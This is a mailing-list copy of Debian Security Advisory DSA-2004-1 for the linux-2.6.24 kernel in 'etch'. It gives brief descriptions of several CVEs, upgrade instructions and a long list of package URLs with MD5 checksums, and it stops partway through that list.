We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ----------------------------------------------------------------------\nDebian Security Advisory DSA-2004-1                security@debian.org\nhttp://www.debian.org/security/                           Dann Frazier\nFebruary 27, 2010                   http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage        : linux-2.6.24\nVulnerability  : privilege escalation/denial of service/sensitive memory leak\nProblem type   : local/remote\nDebian-specific: no\nCVE Id(s)      : CVE-2009-2691 CVE-2009-2695 CVE-2009-3080 CVE-2009-3726\n                 CVE-2009-3889 CVE-2009-4005 CVE-2009-4020 CVE-2009-4021\n                 CVE-2009-4138 CVE-2009-4308 CVE-2009-4536 CVE-2009-4538\n                 CVE-2010-0003 CVE-2010-0007 CVE-2010-0291 CVE-2010-0410\n                 CVE-2010-0415 CVE-2010-0622\n\nNOTE: This kernel update marks the final planned kernel security\nupdate for the 2.6.24 kernel in the Debian release \u0027etch\u0027.  Although\nsecurity support for \u0027etch\u0027 officially ended on Feburary 15th, 2010,\nthis update was already in preparation before that date. \n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, sensitive memory leak or privilege\nescalation. Local users may be\n    able to read this data for setuid processes while the ELF binary\n    is being loaded. \n\nCVE-2009-2695\n\n    Eric Paris provided several fixes to increase the protection\n    provided by the mmap_min_addr tunable against NULL pointer\n    dereference vulnerabilities. \n\nCVE-2009-3080\n\n    Dave Jones reported an issue in the gdth SCSI driver. A missing\n    check for negative offsets in an ioctl call could be exploited by\n    local users to create a denial of service or potentially gain\n    elevated privileges. \n\nCVE-2009-3726\n\n    Trond Myklebust reported an issue where a malicious NFS server\n    could cause a denial of service condition on its clients by\n    returning incorrect attributes during an open call. \n\nCVE-2009-3889\n\n    Joe Malicki discovered an issue in the megaraid_sas driver. \n    Insufficient permissions on the sysfs dbg_lvl interface allow\n    local users to modify the debug logging behavior. \n\nCVE-2009-4005\n\n    Roel Kluin discovered an issue in the hfc_usb driver, an ISDN\n    driver for Colognechip HFC-S USB chip. A potential read overflow\n    exists which may allow remote users to cause a denial of service\n    condition (oops). \n\nCVE-2009-4020\n\n    Amerigo Wang discovered an issue in the HFS filesystem that would\n    allow a denial of service by a local user who has sufficient\n    privileges to mount a specially crafted filesystem. Avati discovered an issue in the fuse subsystem. If the\n    system is sufficiently low on memory, a local user can cause the\n    kernel to dereference an invalid pointer resulting in a denial of\n    service (oops) and potentially an escalation of privileges.  For this to be exploitable, the local user must\n    have sufficient privileges to mount a filesystem. \n\nCVE-2009-4536 \u0026 CVE-2009-4538\n\n    Fabian Yamaguchi reported issues in the e1000 and e1000e drivers\n    for Intel gigabit network adapters which allow remote users to\n    bypass packet filters using specially crafted Ethernet frames. \n    \nCVE-2010-0003\n\n    Andi Kleen reported a defect which allows local users to gain read\n    access to memory reachable by the kernel when the\n    print-fatal-signals option is enabled. This option is disabled by\n    default. \n\nCVE-2010-0007\n\n    Florian Westphal reported a lack of capability checking in the\n    ebtables netfilter subsystem. If the ebtables module is loaded,\n    local users can add and modify ebtables rules. \n\nCVE-2010-0410\n\n     Sebastian Krahmer discovered an issue in the netlink connector\n     subsystem that permits local users to allocate large amounts of\n     system memory resulting in a denial of service (out of memory). \n\nCVE-2010-0415\n\n    Ramon de Carvalho Valle discovered an issue in the sys_move_pages\n    interface, limited to amd64, ia64 and powerpc64 flavors in Debian. \n\nCVE-2010-0622\n\n    Jermome Marchand reported an issue in the futex subsystem that\n    allows a local user to force an invalid futex state which results\n    in a denial of service (oops). \n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 2.6.24-6~etchnhalf.9etch3. \n\nWe recommend that you upgrade your linux-2.6.24 packages. \n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386,\nia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.dsc\n    Size/MD5 checksum:     5118 e05bb21e7655cbfa39aed8d4fd6842eb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.diff.gz\n    Size/MD5 checksum:  4099250 127bad8d653046d37fc52115d4e3a332\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz\n    Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:  4263554 6c56ff077d17eba766af47544ce0f414\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:    83890 62cfd18ed176359831502e70d80b291a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum: 46871628 328ad30d3c07f90c56d821f76e186b40\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:  1550090 1f114fdc3123f135017dbdcd0e4839c6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:  1009878 c7b7abff092940a400703b9168e46daa\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.9etch3_all.deb\n    Size/MD5 checksum:    98248 a2a391008f8855d8358d5f18d9d76044\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:   329786 a212d2b3a94f8a04611c0f20d3d324b9\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum: 27236282 b5bc553c4bf3a49843c45814fab72443\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:    83428 f5f27b9de4905239e6315c77393f1f03\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:    83454 5d152b5b6aa505982ebc7122a770b29b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum: 26641900 c799e7d48937975036b46edf032ecd87\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum: 26620162 eb1c3c27f1ac81959dc0f2ab497aee35\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:  3455268 da2d2cc2b7c4253ac408c30fcfddb28f\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:   329788 f589f8815f7adf02f8884e2dd3ac613f\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb\n    Size/MD5 checksum:   329336 14bf085655b30adc8ab8f6ed4207d415\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum: 19482308 c49d2962c1a391fb00fb1b5f0598b24e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:  3656476 f2f5de65037664d03208fcea83bf2ee2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:    83422 600c7216143f43f9c61b0c2ccd118ea0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:    83434 36f1d8f21ec39a473536dbeda2332e62\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb\n    Size/MD5 checksum:   346940 d3f12fdd61f90749fdd08d857b326327\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:  9357734 3e1165a0795d7db5f7ed8ef84205064b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:   298744 50d8bfa3c06134e190409399a36c5aa9\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:    83546 1742ab93afadd1827009bf1d714e76eb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:    83578 07906e33f9ad267d986991c93eef1048\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum: 10778670 cc38a718ad5fd1c6e92d23e416610bd6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:   308138 34dbc7720b1844833f0b71aa307c37fa\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:   310714 6a2c6fbbc1dd000b8a532227e3b8b5ae\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:  3939512 91c2ba626e754fe407d6dcf3fa01337a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum: 10786892 4d44a4ff751969855a01ad754a7c2b22\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 14375048 fe6ed4dea09aa205d801476667ef03cb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 13847788 4adc3106a987d84e12215156a379f460\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   259624 ac09dcabb624984b7321a5f6b6dbef54\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:    83578 e152e18748e5c80b6d06715db836cf83\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   260838 44bc8ad5796c124b53d85a8c3a4ed912\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   262420 ff0641f04c409dd606c34373e8e16269\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 14830990 cce09e8022bee915dcde5dd8b9525428\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 13333594 a4dc863b0c84b9006c723db9a581c92e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:    83546 990eb24056c7f6a63a4d55ec39563bae\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:  3446386 6ebfa4544252648df48cfb085cc3d2cc\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   258962 75184bed1f0b42cd8e002f93ed42198a\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:  3656680 c5499cb98cdcdcadc48e3aa5bdf1d379\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19214268 e3f564cae5a85355f4b5a9248a11af98\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19148424 dd1d713c896888370a1667a16571c08c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   346982 6a6a08f74f9690705e6d770d1f3f2566\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   359548 b10fe011746b0df5fbd2587292af34ae\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19482314 5d9cc150e340aea40e253a757cfdc423\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:    83452 32a1614212e964a4423b161b34cd758d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19213598 4f459c2d2cdb87a6f945cbee7d4500d4\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   358212 58ba32b0701643f043ab38a487cae609\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:    83424 c1e8493aff96df5b0fe33f5af4686f98\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   358752 4e3e9ef18a14fd191444591df571f80c\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:  3569470 9ae824064bfc785f4b3512db78119e46\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum: 32206374 badd40dd68e2c6634c65f79d9536e34d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:    83432 64a48fa9283b1741e22f0a22dbb93b20\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:    83456 235a5572d5e109a4b575080a8262dc57\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:   319938 d7dc0120458e93119879dcdd1e48017e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum: 32025762 7595d7dc21d3273f46b35b8c00b0e195\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:   320226 34731a37b519d726b133093e04d937c3\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 22243472 532341ea0847ea19414413f7659ff13d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   248638 ce9da5c377d6328e9bb9be1c3945fff8\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 12001172 817c44fd5afbeef1b9f172522ff21bcb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 10553972 20ddd95631b93efd52ae0aa38a5cd6d4\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:    83600 a7b66d71779dea207a3d49cb9f692fdb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 27858364 54998117445c20f413331d1197355745\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 17212542 bf6c996fd387eef151e0db60d1bd00f2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   313302 314b57dc807eb91f617c10b1497e1617\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   314602 2c127076bf189be2836a4c3a4c7736af\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:  3804368 fbcb3bdd668db166ad3f08e6dbfbc6e0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 17194888 9bce41a8b9936a16a3aa9cca675b9638\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:    83540 8acdb1b4a4bc57f55b9cc5b2b04043a4\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   229412 0b93c7c909eca04fad4fa45e3e73e96c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   248700 13266a2acd5fcbd75d11049dd5e5ad58\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   218314 4174dec1c73ca114469cbb88fba32926\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 16567710 29d2ab68b4259a1822a2ca19e9494f5d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   309868 d69b27ef946f2ac62b115e0200fe8002\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 26988356 f0d885b353b15dc42e4e76da8a8fb129\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   248150 7c585f74e0752a631050b13b9740c0c3\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 13318088 0b0a8b724245ac10817b03c4cf734827\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:    83484 a678208f18017a9c87d45548916fd98e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   311392 5b1f0957a2756b04be6c95ae8ca5e2c8\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 21736368 02da1a4e543b8c5082476b156281cb31\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   247968 929ca712a0aa0984f9dc2a6f68f405a5\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 16632240 c9de1dfccb8a5cb5d5d652ca694a7108\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:  3805532 be10a8b64da3adf7ece3846b0b0bf930\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:    83434 ac0cb9b5939e4ea82c3c83a1a1d473ed\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   248174 50e84058a7d710f013f92e1fe68a705c\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   322474 2d7e39cf0b78d98125a0baba377f1af0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 19195556 bb2bd8e203cee7b3c6739d5c5d11901a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   324008 3b021bb4b3dac72dc68e701f4a209939\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   295928 ca2bf1c3c12f409e469c516877a8e91c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 21170062 4022dbff73ebfde3a846ce38896cf09c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   322502 4b76cce255e1fcc72cb82053cd34a1a2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 17459240 ad749c6e735e58d775b7190ff3d26e50\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:    83466 a041c0fdb383832cf725723ce22e40c0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:    83430 392d415932625b1a69dc6494d2f737e0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:  3674486 200fdcca2140a97f961a37d70db620d5\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 19487244 b42ad8431643d89a1f8b0e6e0aaeb39e\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:    83532 a1c34683fe304f1a86bbc28f6cbc654c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:    83556 bf7fed1ef4da92d782409fe8345f861a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  6976486 5b5db16fea4336068bbcd5bff56ad575\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  7228452 